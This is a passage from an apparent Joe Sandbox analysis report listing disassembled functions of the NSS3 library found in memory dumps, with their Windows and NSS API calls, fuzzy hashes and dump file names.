                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3168844106-0
                                                                                                                                                                                                                                                                                          • Opcode ID: aeb33afbd7a36bf34192d478e683e32098aa621bc5fc9ff90bf13d54416a23cf
                                                                                                                                                                                                                                                                                          • Instruction ID: 5d49f947a8a6f2efb0019c8249fa87722f2aaee6cac3f62ed506895fccf583e3
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: aeb33afbd7a36bf34192d478e683e32098aa621bc5fc9ff90bf13d54416a23cf
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 21A1B0317061008BEB68EF24E98876E77B5BB8331DF58413CD81647A41DB7AD845CBEA
                                                                                                                                                                                                                                                                                          Function 6C711E70 Relevance: 7.7, APIs: 5, Instructions: 207COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • PR_EnterMonitor.NSS3(?), ref: 6C711ECC
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7B9090: TlsGetValue.KERNEL32 ref: 6C7B90AB
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7B9090: TlsGetValue.KERNEL32 ref: 6C7B90C9
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7B9090: EnterCriticalSection.KERNEL32 ref: 6C7B90E5
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7B9090: TlsGetValue.KERNEL32 ref: 6C7B9116
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7B9090: LeaveCriticalSection.KERNEL32 ref: 6C7B913F
                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C711EDF
                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C711EEF
                                                                                                                                                                                                                                                                                          • PR_ExitMonitor.NSS3(?), ref: 6C711F37
                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C711F44
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Value$CriticalEnterSection$Monitor$ExitLeaveUnlock
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3539092540-0
                                                                                                                                                                                                                                                                                          • Opcode ID: bc7b688486170af3776979cab0fd13d360f02ed57a93afa7acc63fa480c98ac2
                                                                                                                                                                                                                                                                                          • Instruction ID: 63305ab51afe006285190234b5dc58e0da170d7568722b7141fca5e4964b92a6
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bc7b688486170af3776979cab0fd13d360f02ed57a93afa7acc63fa480c98ac2
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C071E1B1A083019FD700CF24D944A5BB7F5FF99358F184929E89897B11E731F958CB92
                                                                                                                                                                                                                                                                                          Function 6C79DD70 Relevance: 7.7, APIs: 5, Instructions: 179COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C79DD8C
                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(00000000), ref: 6C79DDB4
                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(00000000), ref: 6C79DE1B
                                                                                                                                                                                                                                                                                          • ReleaseSemaphore.KERNEL32(?,00000001,00000000), ref: 6C79DE77
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CriticalLeaveSection$ReleaseSemaphoreValue
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 2700453212-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 353b469d25483b44b28e323c13b8f26d6f8e1edaf42b4ae8afe1c9abbcada65f
                                                                                                                                                                                                                                                                                          • Instruction ID: b0244b9c81ee5a097de3625777bd8ebb91670be9aaa4923288f25c033fddf495
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 353b469d25483b44b28e323c13b8f26d6f8e1edaf42b4ae8afe1c9abbcada65f
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F3718571A00314CFDB20CF9AD6C0689B7B9BF69718F25817EC9596B702D770A905CF80
                                                                                                                                                                                                                                                                                          Function 6C70DFA0 Relevance: 7.6, APIs: 5, Instructions: 143COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C70AB10: DeleteCriticalSection.KERNEL32(D958E852,6C711397,5B5F5EC0,?,?,6C70B1EE,2404110F,?,?), ref: 6C70AB3C
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C70AB10: free.MOZGLUE(D958E836,?,6C70B1EE,2404110F,?,?), ref: 6C70AB49
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C70AB10: DeleteCriticalSection.KERNEL32(5D5E6C90), ref: 6C70AB5C
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C70AB10: free.MOZGLUE(5D5E6C84), ref: 6C70AB63
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C70AB10: DeleteCriticalSection.KERNEL32(0148B821,?,2404110F,?,?), ref: 6C70AB6F
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C70AB10: free.MOZGLUE(0148B805,?,2404110F,?,?), ref: 6C70AB76
                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,?,6C70B266,6C7115C6,?,?,6C7115C6), ref: 6C70DFDA
                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,6C70B266,6C7115C6,?,?,6C7115C6), ref: 6C70DFF3
                                                                                                                                                                                                                                                                                          • PK11_IsFriendly.NSS3(?,?,?,?,6C70B266,6C7115C6,?,?,6C7115C6), ref: 6C70E029
                                                                                                                                                                                                                                                                                          • PK11_IsLoggedIn.NSS3 ref: 6C70E046
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C718F70: PK11_GetInternalKeySlot.NSS3(?,?,00000002,?,?,?,6C70DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C718FAF
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C718F70: PR_Now.NSS3(?,?,00000002,?,?,?,6C70DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C718FD1
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C718F70: TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6C70DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C718FFA
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C718F70: EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6C70DA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6C719013
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C718F70: PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C70DA9B,?,00000000,?,?,?,?,CE534353), ref: 6C719042
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C718F70: TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6C70DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C71905A
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C718F70: EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6C70DA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6C719073
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C718F70: PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C70DA9B,?,00000000,?,?,?,?,CE534353), ref: 6C719111
                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,6C70B266,6C7115C6,?,?,6C7115C6), ref: 6C70E149
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CriticalSection$DeleteEnterK11_UnlockValuefree$FriendlyInternalLoggedSlot
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 4224391822-0
                                                                                                                                                                                                                                                                                          • Opcode ID: d67ab94579f2c3ed517958c1901ddf2b2f21c1326437d8cddc7dc7f603d813bc
                                                                                                                                                                                                                                                                                          • Instruction ID: a7d18478f24f53cd4aa575b1bbb856ddc70116327d3c25d23467f6107996e4d4
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d67ab94579f2c3ed517958c1901ddf2b2f21c1326437d8cddc7dc7f603d813bc
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BB5137B0604605CFDB10AF29C68876ABBF1BF44318F25896DD8D98B741E771E884CB82
                                                                                                                                                                                                                                                                                          Function 6C71BE90 Relevance: 7.6, APIs: 5, Instructions: 141COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • SEC_ASN1EncodeItem_Util.NSS3(00000000,00000000,?,?), ref: 6C71BF06
                                                                                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C71BF56
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000,?,?,6C6F9F71,?,?,00000000), ref: 6C71BF7F
                                                                                                                                                                                                                                                                                          • CERT_DestroyCertificate.NSS3(00000000), ref: 6C71BFA9
                                                                                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C71C014
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Item_Util$Zfree$CertificateDestroyEncodeError
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3689625208-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 2a91447e2b4c9a1fb39fa6d3d8f5fed250e664bee3f149358c2a7ca7a3af42fe
                                                                                                                                                                                                                                                                                          • Instruction ID: 0bd6acf929bd491d845a9963473252a047c1ac18bd01fe0f365010767608829c
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2a91447e2b4c9a1fb39fa6d3d8f5fed250e664bee3f149358c2a7ca7a3af42fe
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9C41D5B1A052059BEB00DE65CE48BBA73BDAF44208F584138E918D7F81EB31E905CBD1
                                                                                                                                                                                                                                                                                          Function 6C6EEDE0 Relevance: 7.6, APIs: 5, Instructions: 97COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C6EEDFD
                                                                                                                                                                                                                                                                                          • calloc.MOZGLUE(00000001,00000000), ref: 6C6EEE64
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE8AC,00000000), ref: 6C6EEECC
                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C6EEEEB
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C6EEEF6
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: ErrorValuecallocfreememcpy
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3833505462-0
                                                                                                                                                                                                                                                                                          • Opcode ID: e63a0882c3c7e43d7c9047bf5dd04736e45e206fac844bf5507992ca6a70c0b5
                                                                                                                                                                                                                                                                                          • Instruction ID: e84d7b78cc2ac6f99a4ff88fbde091e3ad3fb49e9ab6ce74ff0456817eec86fb
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e63a0882c3c7e43d7c9047bf5dd04736e45e206fac844bf5507992ca6a70c0b5
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F5314B7160A2009BD7309F2CCC447667BF4FB4E309F54053AE85A87A51EB35E815CBD9
                                                                                                                                                                                                                                                                                          Function 6C701F10 Relevance: 7.6, APIs: 5, Instructions: 96COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • PORT_NewArena_Util.NSS3(00000800), ref: 6C701F1C
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C750FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C6F87ED,00000800,6C6EEF74,00000000), ref: 6C751000
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C750FF0: PR_NewLock.NSS3(?,00000800,6C6EEF74,00000000), ref: 6C751016
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C750FF0: PL_InitArenaPool.NSS3(00000000,security,6C6F87ED,00000008,?,00000800,6C6EEF74,00000000), ref: 6C75102B
                                                                                                                                                                                                                                                                                          • SEC_ASN1EncodeItem_Util.NSS3(00000000,0000000100000017,FFFFFFFF,6C819EBC), ref: 6C701FB8
                                                                                                                                                                                                                                                                                          • SEC_ASN1EncodeItem_Util.NSS3(6C819E9C,?,?,6C819E9C), ref: 6C70200A
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE022,00000000), ref: 6C702020
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6F6A60: PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?,?,6C6FAD50,?,?), ref: 6C6F6A98
                                                                                                                                                                                                                                                                                          • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C702030
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Util$ArenaArena_EncodeItem_$Alloc_ErrorFreeInitLockPoolcalloc
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 1390266749-0
                                                                                                                                                                                                                                                                                          • Opcode ID: d75f9f5e39c15dea7c6e2e04ed98d37c9ad604232955b3c2f4db318b9de00b01
                                                                                                                                                                                                                                                                                          • Instruction ID: 2f0a93e842fb6b228c921fb39fe475686cd0e54813241d1f7324d1614450c7df
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d75f9f5e39c15dea7c6e2e04ed98d37c9ad604232955b3c2f4db318b9de00b01
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2521E9F6A01606ABE7114A15DE44FAA77A9FF4231CF144225F82896F90E732F528C7A1
                                                                                                                                                                                                                                                                                          Function 6C6F1DD0 Relevance: 7.6, APIs: 5, Instructions: 81timeCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6C6F1E0B
                                                                                                                                                                                                                                                                                          • DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6C6F1E24
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C6F1E3B
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE00B,00000000), ref: 6C6F1E8A
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE00B,00000000), ref: 6C6F1EAD
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Error$Choice_DecodeTimeUtil
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 1529734605-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 3dc7a9991bdab14f31a8e9b1173daa122c9a931c4753cfbc54ea79520adb91f5
                                                                                                                                                                                                                                                                                          • Instruction ID: b832080077ee8ebac56c75ebdead249c55c44dfe09657d593264842eb1e50b32
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3dc7a9991bdab14f31a8e9b1173daa122c9a931c4753cfbc54ea79520adb91f5
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 14216AB2E04310A7D7008E69DC45B8BB396EB843A9F448238EC3D57780E731D90B87D6
                                                                                                                                                                                                                                                                                          Function 6C801E40 Relevance: 7.6, APIs: 5, Instructions: 75threadCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • PR_GetCurrentThread.NSS3 ref: 6C801E5C
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7B9BF0: TlsGetValue.KERNEL32(?,?,?,6C800A75), ref: 6C7B9C07
                                                                                                                                                                                                                                                                                          • PR_Lock.NSS3(00000000), ref: 6C801E75
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE89D,00000000), ref: 6C801EAB
                                                                                                                                                                                                                                                                                          • PR_GetCurrentThread.NSS3 ref: 6C801ED0
                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C801EE8
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CurrentThread$ErrorLockUnlockValue
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 121300776-0
                                                                                                                                                                                                                                                                                          • Opcode ID: f4baafb76641702fe314f9a7a371038e919d6eb9a9f591bf6a2e2ed471809b6c
                                                                                                                                                                                                                                                                                          • Instruction ID: 950a9cef35f9991ada7f7b5e424925a8737aef959e067b77e26ae4e3a31e3e4b
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f4baafb76641702fe314f9a7a371038e919d6eb9a9f591bf6a2e2ed471809b6c
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2521BD74B14612ABDB20CF19DE84A0AB7B0FF4572CF658A29D8199BB40D730F810CBD1
                                                                                                                                                                                                                                                                                          Function 6C74BE60 Relevance: 7.6, APIs: 5, Instructions: 74memoryCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • SECOID_FindOIDByTag_Util.NSS3(00000000,00000000,00000000,00000000,?,6C6FE708,00000000,00000000,00000004,00000000), ref: 6C74BE6A
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C750840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C7508B4
                                                                                                                                                                                                                                                                                          • SECITEM_CopyItem_Util.NSS3(00000000,?,00000000,00000000,?,?,?,?,?,?,?,00000000,?,?,6C7004DC,?), ref: 6C74BE7E
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C74FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C748D2D,?,00000000,?), ref: 6C74FB85
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C74FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C74FBB1
                                                                                                                                                                                                                                                                                          • SECITEM_CopyItem_Util.NSS3(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,00000000,?), ref: 6C74BEC2
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE006,00000000,00000000,?,?,?,?,?,?,?,00000000,?,?,6C7004DC,?,?), ref: 6C74BED7
                                                                                                                                                                                                                                                                                          • SECITEM_AllocItem_Util.NSS3(?,?,00000002,?,?,?,00000000,?,?,?,?,?,?,?,00000000,?), ref: 6C74BEEB
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
